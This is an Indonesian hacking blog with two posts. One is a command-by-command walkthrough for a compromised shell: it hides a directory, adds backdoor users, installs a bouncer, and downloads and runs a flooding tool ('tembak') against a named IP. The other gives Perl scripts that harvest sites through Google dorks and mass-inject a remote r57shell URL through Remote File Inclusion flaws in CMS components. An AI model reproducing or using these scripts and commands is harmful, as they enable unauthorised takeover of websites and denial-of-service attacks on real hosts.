.::. Banjarmasin Hack .::.
.::. Mari Kita Sapadingsanakan saling babagi Ilmu. Waja Sampai Ka Puting .::.
Monday, January 01, 2007
Tembak IP/DNS
Tembak IP/DNS

====================================

Cara Pertama

====================================

Contoh sasaran kita dengan IP : 202.143.48.20

# Pertama Login dulllu ke shell kamu Lalu Ketikkan Perintah dibawah ini :

gcc

w

cd /var/tmp/

ls -al

mkdir " "

wget http://www.geocities.com/finalheaven_ardi/oidentd-1.9.9.1.tar.gz

tar zxvf oidentd-1.9.9.1.tar.gz

cd oidentd-1.9.9.1/

./configure

make

make install

cd ..

ls -al

rm -rf " "

mkdir "..."

ls -al

cd ...

adduser valid

passwd valid

wget kotak-hitam.anaknaga.com/dinobebz.tar.gz

tar -zxvf dinobebz.tar.gz

cd dinobebz

./kik 'bash -i' ./bash

pico psybnc.conf

cd ..

ls -al

rm -rf dinobebz

rm -rf dinobebz.tar.gz

cd ..

adduser ekoy

passwd ekoy

cd /var/tmp/

ls -al

cd ...

wget http://www.geocities.com/finalheaven_ardi/tembak.c

gcc -o tembak tembak.c

./tembak

./tembak 202.143.48.20 3128




====================================



Cara Singkat nya



====================================



cd /var/tmp/

ls -al

cd ...

wget http://www.geocities.com/finalheaven_ardi/tembak.c


gcc -o tembak tembak.c

./tembak

./tembak XXX.XXX.XX.X 3128 <-------- ./tembak XXX.XXX.XX.X IP sasaran kita



Hingga muncul tulisan



Pasukan........ Tembaaaaaaaaaaaaaaaaaaaaak...!!!



Selesai sudah. tinggal mendengar kabar saja dari sasaran kita gimana rasanya lag .....He..he..he
posted by banjar-hack @ 10:03 PM   3 comments
Google Mass Remote File Inclussion Scanner
By : LoneEagle


Gw hanya bisa geleng - geleng kepala dengan banyaknya advisories
Remote file inclussion baik di securityfocus atau milw0rm, ga terasa
advisories security hanya layaknya mainan anak kecil yang malas
menganalisa code, terbukti dengan banyaknya advisories yang isinya
hanya google dork : "blablabla", what kind of lamme advisories!!

Ahh, gw ga peduli dengan semua itu gw cuma mo share google mass
RFI scanner dari pada nyari bug di CMS (kan uda banyak yang nyari :D)
Cara pakenya sederhana aja
1. Siapin r57shell sebagai phpshell untuk inject
2. perl lwpgoogle.pl
3. perl massinject.pl


=========================== lwpgoogle.pl ==============================


#!/usr/bin/perl
#Reference :
#http://geocities.com/iko94/
#http://www.troubleshooters.com/codecorn/littperl/perlreg.htm

-print "Grabbing website through google\n";
-print "Code By LoneEagle\n";
-print "http://kandangjamur.net\n";

-if(!$ARGV[0]){
- print "Usage #perl $0 \n";
-exit;
-}

require LWP::UserAgent;
use HTTP::Message;

$proxy='http://127.0.0.1:2221/';
$dork=$ARGV[0];
$ua = LWP::UserAgent->new;
$ua->timeout(30);
$ua->agent("MSIE/6.0 Windows");
$ua->proxy(http => $proxy) if defined($proxy);
$counter=0;
print "Pencarian menggunakan kata kunci : $dork\n";
$hasil="";
while($hasilx !~ /hasil penyajian/)
{
$googleurl="http://www.google.co.id/search?q=$dork&hl=id&lr=&start=$a&sa=N";
$grabresponse = $ua->get($googleurl);
$counter=$counter+10;
if (!($grabresponse->is_success)) {
print ($grabresponse->status_line. " Failure\n");
} else {
@hasil = $grabresponse->as_string;
$hasilx="@hasil";
sleep 1;
#print "$hasilx";
if($hasilx =~ /tak cocok/)
{
print "Ga ada hasil boz\n";
exit;
}

while($hasilx =~ m//)
{
$hasilx =~ s/
/$1/;
$hell = $1;
print "$hell\n";
open(f,">>google_log.txt");
print f "$hell\n";
close(f);
}
$a+=10;
}
}
print "\nSilakan liat hasilnya di google_log.txt\n";


============================ massinject.pl ===============================

#!/usr/bin/perl
#Reference :
#http://geocities.com/iko94/
#http://www.troubleshooters.com/codecorn/littperl/perlreg.htm
#http://www.tizag.com/perlT/perlarrays.php

print "Mass Remote File Inclussion\n";
print "Code By LoneEagle\n";
print "http://kandangjamur.net\n";

if(!$ARGV[0])
{
print "Usage #$0 \n";
exit;
}

require LWP::UserAgent;
use HTTP::Message;

#KONFIGURASI MASS INJECTION
#DEFINISI VULNERABILITY (TAMBAIH DEWEK YOHH!!)
$vuln="components/com_calendar.php?absolute_path=";
#$vuln="components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=";
#$vuln="components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=";
#$vuln="components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=";
#DAN LAINNYA TAMBAH NDIRI
#DEFINISI EVIL HTTP PHPSHELL
$phpshell="http://fuck.com/audit/mylocalakses/phpshell.txt?";
#AKHIR KONFIGURASI

$proxy='http://172.20.2.1:3128/';
$google_f=$ARGV[0];
$ua = LWP::UserAgent->new;
$ua->timeout(30);
$ua->agent("MSIE/6.0 Windows");
$ua->proxy(http => $proxy) if defined($proxy);

open(ff,$google_f);
@myurl=;
close(ff);

for($a=0;$a<$#myurl;$a++)
{
$myurl[$a] =~ m/(http:\/\/.*?\/)index.php/;
if($1 !~ //)
{
$gourl=$1.$vuln.$phpshell;
#$gourl=$1.$vuln.$phpshell;
#$gourl=$1.$vuln.$phpshell;
#$gourl=$1.$vuln.$phpshell;
print "Processing $gourl ...\n";
$browse = $ua->get($gourl);
if(!($browse->is_success)) {
print($browse->status_line. " Failure\n");
} elsif(($browse->is_success)) {
@hasil = $browse->as_string;
$hasilx = "@hasil";
if($hasilx =~ /http:\/\/rst.void.ru\/download\/r57shell.txt/){
print(" VULNERABLE..[OK]\n");
open(f,">>vulnlog.txt");
print f "$gourl\n";
close(f);
} else {
print "Not Vulnerable\n";
}
}
}
}

print "Finish RFI mass injecting, see result in vulnlog.txt file\n";


============================== EOF ==================
posted by banjar-hack @ 11:13 AM   1 comments
 
The Time

Previous Post
Archives
it's You?




Links
SecurityDownload
  • -
  • -
  • -
  • -
Powered by

Isnaini Dot Com

BLOGGER